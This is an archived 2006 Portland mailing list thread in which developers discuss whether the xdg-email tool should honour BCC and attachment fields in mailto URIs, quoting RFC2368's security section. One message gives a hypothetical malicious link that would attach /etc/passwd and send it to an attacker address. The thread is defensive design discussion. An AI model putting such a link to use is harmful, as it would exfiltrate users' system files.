[Portland] RE: xdg-email BCC

Bastian, Waldo waldo.bastian at intel.com
Fri Jun 2 15:23:23 PDT 2006 

[CC'ing Portland list]

Well RFC2368 was written with the web in mind. Our use case here is slightly different, we want to give applications the possibility to invoke a mailer. The points made in the RFC remain valid though, so maybe we should offer explicit options for BCC and Attachment but not honour these options when they are part of the URL. Maybe we should go even further and offer all other options as an explicit command line options as well, which might be convenient in case you have the individual elements at hand but not a URL. What do other people think?

Waldo Bastian
Linux Client Architect - Client Linux Foundation Technology
Channel Platform Solutions Group
Intel Corporation - http://www.intel.com/go/linux
OSDL DTL Tech Board Chairman
________________________________________
From: Whipple, Tom 
Sent: Friday, June 02, 2006 3:03 PM
To: Bastian, Waldo
Subject: xdg-email BCC

>From the description in the xdg-email manpage:

"mailto-uri may contain ... bcc, subject, body and attachment."

However, from section 7 of RFC2368

   A mail client should never send anything without complete disclosure
   to the user of what is will be sent; it should disclose not only the
   message destination, but also any headers. Unrecognized headers, or
   headers with values inconsistent with those the mail client would
   normally send should be especially suspect. MIME headers (MIME-
   Version, Content-*) are most likely inappropriate, as are those
   relating to routing (From, Bcc, Apparently-To, etc.)

   Note that some headers are inherently unsafe to include in a message
   generated from a URL. For example, headers such as "From:", "Bcc:",
   and so on, should never be interpreted from a URL. In general, the
   fewer headers interpreted from the URL, the less likely it is that a
   sending agent will create an unsafe message.

So, I don't think Bcc should be mentioned in the manpage. But, this is a "should not" so I don't think we need to test to see that this is NOT supported.

Also, attachment is not mentioned in the RFC. I don't know if we want to think about it here and now, but what if I made a webpage with a link such as 'mailto:hacker at evil.org?attachment=/etc/passwd'. It seems that this would also be a security consideration.

-tom

More information about the Portland mailing list